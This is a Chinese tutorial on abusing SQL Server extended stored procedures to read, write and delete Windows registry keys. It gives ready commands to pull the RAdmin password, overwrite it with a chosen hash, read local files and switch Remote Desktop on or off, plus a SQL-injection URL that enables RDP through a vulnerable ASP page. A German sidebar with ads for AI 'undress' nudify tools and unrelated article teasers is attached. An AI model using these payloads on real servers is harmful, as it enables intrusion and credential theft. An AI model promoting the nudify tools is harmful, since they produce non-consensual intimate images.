几个扩展存储过程使用方法
sqlserver里面有一些危险的扩展存储过程,可以操作注册表,所以很多情况下,下面的存储过程为了服务器安全都会将这些存储过程删除。不过防御与安全同等重要。下面是具体的注册的操作方法。
SQL Server中包含了几个可以访问系统的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统的能力,
而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们.
xp_regenumvalues 以多个记录集方式返回所有键值
使用方法:
xp_regenumvalues 根键, 子键
比如说,想看看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 的所有键值:
use master
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
xp_regread 返回制定键的值
使用方法:
xp_regread 根键,子键,键值名
use master
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
得到密码
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'
远程桌面开启为0
xp_regwrite 写入
使用方法:
xp_regwrite 根键,子键, 值名, 值类型, 值
use master
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23;--
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY','';--
必须清空后再写新数值
修改成功的前提是值为空
注意值类型有2种REG_SZ 表示字符型,相当于新建字符串值,REG_DWORD 表示整型,相当于新建DWORD值
REG_BINARY
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',1;--
禁用远程桌面
xp_regdeletevalue 删除某个值
使用方法:
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
use master
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
xp_regdeletekey 删除键,包括该键下所有值
使用方法:
use master
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
运行前提SA
可能用处不是很大,也没深入研究,因为觉得读asp用xp_makecab更方便点,仅供思维扩展。
方法1.bulk insert aaa FROM 'c:\1.txt'
方法2.xp_readerrorlog 1,'c:\1.txt'
开启远程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;--
Heiße KI -Werkzeuge
Undresser.AI Undress
KI-gestützte App zum Erstellen realistischer Aktfotos
AI Clothes Remover
Online-KI-Tool zum Entfernen von Kleidung aus Fotos.
Undress AI Tool
Ausziehbilder kostenlos
Clothoff.io
KI-Kleiderentferner
AI Hentai Generator
Erstellen Sie kostenlos Ai Hentai.
Heißer Artikel
Heiße Werkzeuge
Notepad++7.3.1
Einfach zu bedienender und kostenloser Code-Editor
SublimeText3 chinesische Version
Chinesische Version, sehr einfach zu bedienen
Senden Sie Studio 13.0.1
Leistungsstarke integrierte PHP-Entwicklungsumgebung
Dreamweaver CS6
Visuelle Webentwicklungstools
SublimeText3 Mac-Version
Codebearbeitungssoftware auf Gottesniveau (SublimeText3)
Heiße Themen
1377
52
Von Anfang bis Ende: So verwenden Sie die PHP-Erweiterung cURL, um HTTP-Anfragen zu stellen
Jul 29, 2023 pm 05:07 PM
Von Anfang bis Ende: So verwenden Sie die PHP-Erweiterung cURL für HTTP-Anfragen. Einführung: Bei der Webentwicklung ist es häufig erforderlich, mit APIs von Drittanbietern oder anderen Remote-Servern zu kommunizieren. Die Verwendung von cURL zum Senden von HTTP-Anfragen ist eine gängige und leistungsstarke Methode. In diesem Artikel wird erläutert, wie Sie mit PHP cURL erweitern, um HTTP-Anfragen auszuführen, und einige praktische Codebeispiele bereitstellen. 1. Vorbereitung Stellen Sie zunächst sicher, dass PHP die cURL-Erweiterung installiert hat. Zur Überprüfung können Sie php-m|grepcurl in der Befehlszeile ausführen
Erweiterungen und Drittanbietermodule für PHP-Funktionen
Apr 13, 2024 pm 02:12 PM
Um die Funktionalität der PHP-Funktion zu erweitern, können Sie Erweiterungen und Module von Drittanbietern verwenden. Erweiterungen stellen zusätzliche Funktionen und Klassen bereit, die über den pecl-Paketmanager installiert und aktiviert werden können. Module von Drittanbietern bieten spezifische Funktionen und können über den Composer-Paketmanager installiert werden. Zu den praktischen Beispielen gehören die Verwendung von Erweiterungen zum Parsen komplexer JSON-Daten und die Verwendung von Modulen zur Datenvalidierung.
Schritte und Vorsichtsmaßnahmen für die Implementierung von Batch-Updates mithilfe gespeicherter Oracle-Prozeduren
Mar 08, 2024 pm 04:12 PM
Titel: Schritte und Vorsichtsmaßnahmen für die Implementierung von Stapelaktualisierungen durch gespeicherte Oracle-Prozeduren. In Oracle-Datenbanken handelt es sich bei gespeicherten Prozeduren um eine Reihe von SQL-Anweisungen, die dazu dienen, die Datenbankleistung zu verbessern, Code wiederzuverwenden und die Sicherheit zu erhöhen. Gespeicherte Prozeduren können zum Aktualisieren von Daten in Stapeln verwendet werden. In diesem Artikel wird erläutert, wie gespeicherte Oracle-Prozeduren zum Implementieren von Batch-Updates verwendet werden, und es werden spezifische Codebeispiele bereitgestellt. Schritt 1: Erstellen Sie eine gespeicherte Prozedur. Zuerst müssen wir eine gespeicherte Prozedur erstellen, um Stapelaktualisierungsvorgänge zu implementieren. Im Folgenden erfahren Sie, wie Sie eine gespeicherte Prozedur erstellen
Wie installiere ich die MBstring-Erweiterung unter CENTOS7?
Jan 06, 2024 pm 09:59 PM
1.UncaughtError:Calltoundefinedfunctionmb_strlen(); Wenn der obige Fehler auftritt, bedeutet dies, dass wir die mbstring-Erweiterung nicht installiert haben. 2. Geben Sie das PHP-Installationsverzeichnis cd/temp001/php-7.1.0/ext/mbstring ein. 3. Starten Sie phpize( /usr/local/bin /phpize oder /usr/local/php7-abel001/bin/phpize) Befehl zum Installieren der PHP-Erweiterung 4../configure--with-php-config=/usr/local/php7-abel
So löschen Sie eine gespeicherte Prozedur in MySQL
Sep 05, 2023 am 10:25 AM
Zu den MySQL-Methoden zum Löschen gespeicherter Prozeduren gehören die Verwendung der DROP PROCEDURE-Anweisung, die Verwendung von MySQL Workbench und die Verwendung von Befehlszeilentools. Detaillierte Einführung: 1. Verwenden Sie die DROP PROCEDURE-Anweisung. Die Schritte bestehen darin, zuerst den MySQL-Client zu öffnen oder ein beliebiges Tool zu verwenden, das MySQL unterstützt, dann eine Verbindung zu Ihrer MySQL-Datenbank herzustellen und schließlich die folgende SQL-Anweisung auszuführen, um die gespeicherte Prozedur zu löschen. Verwenden Sie MySQL Workbench, um gespeicherte Prozeduren usw. zu löschen.
Gespeicherte Oracle-Prozedur: Implementierungsmethode zur Bestimmung, ob eine Tabelle vorhanden ist
Mar 08, 2024 pm 09:18 PM
Gespeicherte Prozeduren in Oracle-Datenbanken sind eine bestimmte Art von gespeicherten Prozeduren, die zum Ausführen einer Reihe von SQL-Anweisungen und Datenoperationen in der Datenbank verwendet werden. Bei der tatsächlichen Datenbankentwicklung müssen wir manchmal feststellen, ob eine bestimmte Tabelle in der Datenbank vorhanden ist, damit wir im gespeicherten Prozess eine gewisse Beurteilung und logische Verarbeitung vornehmen können. Im Folgenden stellen wir vor, wie Sie die Methode zur Bestimmung, ob eine Tabelle in der Oracle-Datenbank vorhanden ist, implementieren und stellen spezifische Codebeispiele bereit. Erstens können wir die Systemtabelle user_tables oder all_t verwenden
Implementierungsprinzipien und Anwendungen gespeicherter Golang-Prozeduren
Feb 22, 2024 pm 04:57 PM
Implementierungsprinzipien und Anwendungen gespeicherter Golang-Prozeduren Eine gespeicherte Prozedur ist ein vorkompiliertes Programm, das in einer relationalen Datenbank gespeichert ist und von einer Anwendung aufgerufen werden kann. Sie kann die Kosten für die Netzwerkübertragung von Daten effektiv senken und die Ausführungseffizienz der Datenbank verbessern. Obwohl Golang gespeicherte Prozeduren nicht direkt unterstützt, können Sie die Funktionen gespeicherter Prozeduren mithilfe von SQL-Anweisungen simulieren. In diesem Artikel werden die Prinzipien und Anwendungen der Implementierung gespeicherter Prozeduren in Golang vorgestellt und spezifische Codebeispiele bereitgestellt. 1. Das Implementierungsprinzip der gespeicherten Golang-Prozedur ist in Gol
So schreiben Sie benutzerdefinierte gespeicherte Prozeduren und Funktionen in MySQL mit C#
Sep 22, 2023 am 09:42 AM
So schreiben Sie benutzerdefinierte gespeicherte Prozeduren und Funktionen in MySQL mit C#. Einführung: MySQL ist ein weit verbreitetes Open-Source-Datenbankverwaltungssystem, und C# ist eine häufig verwendete objektorientierte Programmiersprache. Während des Entwicklungsprozesses müssen wir häufig in Datenbanken gespeicherte Prozeduren und Funktionen verwenden, um die Wiederverwendbarkeit und Leistung des Codes zu verbessern. In diesem Artikel wird erläutert, wie Sie mit C# benutzerdefinierte gespeicherte Prozeduren und Funktionen in einer MySQL-Datenbank schreiben, und es werden spezifische Codebeispiele bereitgestellt. 1. Gespeicherte Prozeduren Eine gespeicherte Prozedur ist eine Reihe von SQL-Anweisungen, die bestimmte Aufgaben ausführen.
